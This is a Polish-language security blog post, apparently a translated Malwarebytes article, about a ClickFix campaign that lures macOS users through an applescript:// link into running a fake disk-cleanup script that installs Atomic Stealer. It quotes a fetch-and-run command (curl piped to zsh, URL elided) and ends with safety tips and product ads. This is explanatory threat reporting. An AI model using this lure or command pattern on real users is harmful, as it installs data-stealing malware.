Organizatorzy kampanii ClickFix poszukują obecnie alternatywnych rozwiązań, ponieważ wielu Mac zdało sobie sprawę z zagrożeń związanych z wklejaniem niektórych poleceń w Terminalu.
Naukowcy odkryli, że że firma ClickFix stosuje te same metody socjotechniczne, ale całkowicie ominęła program Terminal, korzystając z applescript:// Schemat adresu URL służący do automatycznego otwierania Edytora skryptów wraz z gotowym do uruchomienia skryptem, który pobiera program Atomic Stealer.
ClickFix to metoda socjotechniczna, która nakłania użytkowników do zainfekowania własnego urządzenia złośliwym oprogramowaniem. Użytkownicy otrzymują polecenie uruchomienia określonych poleceń, które powodują pobranie złośliwego oprogramowania, zazwyczaj programu służącego do kradzieży danych.
Atakujący zastąpili instrukcję „skopiuj i wklej do Terminala” słowami „wystarczy kliknąć ten przycisk i uruchomić skrypt przygotowany przez firmę Apple”.
Przekonującym argumentem jest nieustannie popularny hasło „Odzyskaj miejsce na dysku w komputerze Mac”. Jeden z wyników wyszukiwania dotyczących starej metody wyglądał następująco:
Wprowadzanie zaszyfrowanego polecenia curl w terminalu to zawsze zły pomysł. Jednak to, co nastąpi później, jest równie niebezpieczne, a spodziewam się, że użytkownicy będą bardziej skłonni podążać za tym schematem.
Nowa metoda wygląda mniej więcej tak:
Główna różnica polega na sposobie uruchomienia skryptu: zamiast prosić użytkownika o wklejenie skomplikowanych poleceń, strona udostępnia skrypt „AppleScript” uruchamiany jednym kliknięciem, który rzekomo czyści komputer Mac nawet wyświetla fałszywe okno dialogowe z komunikatem „Zwolniono 24,7 GB”.
Pod maską applescript:// Głębokie łącze otwiera Edytor skryptów z gotowym skryptem „konserwacyjnym”. Jednak prawdziwym zadaniem tego skryptu jest do shell script "curl -kSsfL <obfuscated URL> | zsh". W ten sposób pobierany jest skrypt drugiego etapu, który odszyfrowuje kolejny skrypt, a ten z kolei pobiera program pomocniczy (wariant Atomic Stealer) i uruchamia go.
Atomic Stealer, znany również jako AMOS, to popularny program służący do kradzieży danych w systemie macOS. Jednak Atomic Stealer to tylko obecny ładunek. Jutro może to być MacSync, Infiniti lub coś zupełnie nowego.
W końcu to wciąż infekcja, do której użytkownik sam się doprowadził, ponieważ to on udziela wszystkich uprawnień, klikając kolejne okna dialogowe i uruchamiając skrypt.
Jak zachować bezpieczeństwo
Według doniesień, w 2025 roku ClickFix odpowiadał za ponad połowę wszystkich działań związanych z ładowaniem złośliwego oprogramowania. Jednym z powodów jego sukcesu jest to, że w ramach prowadzonych kampanii stale wprowadzano – i nadal wprowadza się – nowemetodyoszukiwania użytkowników, a także różnepoleceniamające na celu uniknięcie wykrycia.
Użytkownicy systemu macOS Tahoe otrzymają ostrzeżenie przed korzystaniem z tych skryptów, jeśli system operacyjny jest zaktualizowany (wersja 26.4 lub nowsza).
W związku z tym, że ClickFix działa na szeroką skalę i nieustannie wymyśla nowe metody, należy zachować czujność, ostrożność i zadbać o swoje bezpieczeństwo.
- Zwolnij. Niespiesz sięz wykonywaniem instrukcji na stronie internetowej lub w monicie, zwłaszcza jeśli wymagają one uruchomienia poleceń na urządzeniu lub skopiowania i wklejenia kodu. Atakujący wykorzystują poczucie pilności, aby ominąć Twoje krytyczne myślenie, więc zachowaj ostrożność w przypadku stron nakłaniających do podjęcia natychmiastowych działań. Zaawansowane strony ClickFix zawierają liczniki czasu, liczniki użytkowników lub inne taktyki wywierające presję, aby skłonić Cię do szybkiego działania.
- Unikaj uruchamiania poleceń lub skryptów z niezaufanych źródeł. Nigdy nieuruchamiaj kodu ani poleceń skopiowanych ze stron internetowych, wiadomości e-mail lub komunikatów, chyba że ufasz źródłu i rozumiesz cel działania. Zweryfikuj instrukcje niezależnie. Jeśli strona internetowa nakazuje wykonanie polecenia lub czynności technicznej, przed przystąpieniem do działania sprawdź oficjalną dokumentację lub skontaktuj się z pomocą techniczną.
- Ogranicz stosowanie funkcji kopiowania i wklejania poleceń. Ręcznewpisywanie poleceń zamiast kopiowania i wklejania może zmniejszyć ryzyko nieświadomego uruchomienia złośliwego oprogramowania ukrytego w skopiowanym tekście.
- Zabezpiecz swoje urządzenia. Korzystaj zaktualnegorozwiązania antywirusowegodziałającego w czasie rzeczywistym, wyposażonego w komponent ochrony sieciowej.
- Zdobądź wiedzę na temat ewoluujących technik ataków.Świadomość, że ataki mogą pochodzić z nieoczekiwanych źródeł i ewoluować, pomaga zachować czujność. Czytaj dalej naszego bloga!
Porada dla profesjonalistów:Czy wiesz, że bezpłatny program Malwarebytes Browser Guard ostrzega Cię, gdy strona internetowa próbuje skopiować coś do schowka?
Spójrzmy prawdzie w oczy – okno incognito ma swoje ograniczenia.
Naruszenia bezpieczeństwa, handel na dark webie, oszustwa kredytowe. Theft Malwarebytes Identity Theft monitoruje wszystkie te zagrożenia, szybko Cię o nich powiadamia i obejmuje ubezpieczenie od kradzieży tożsamości.
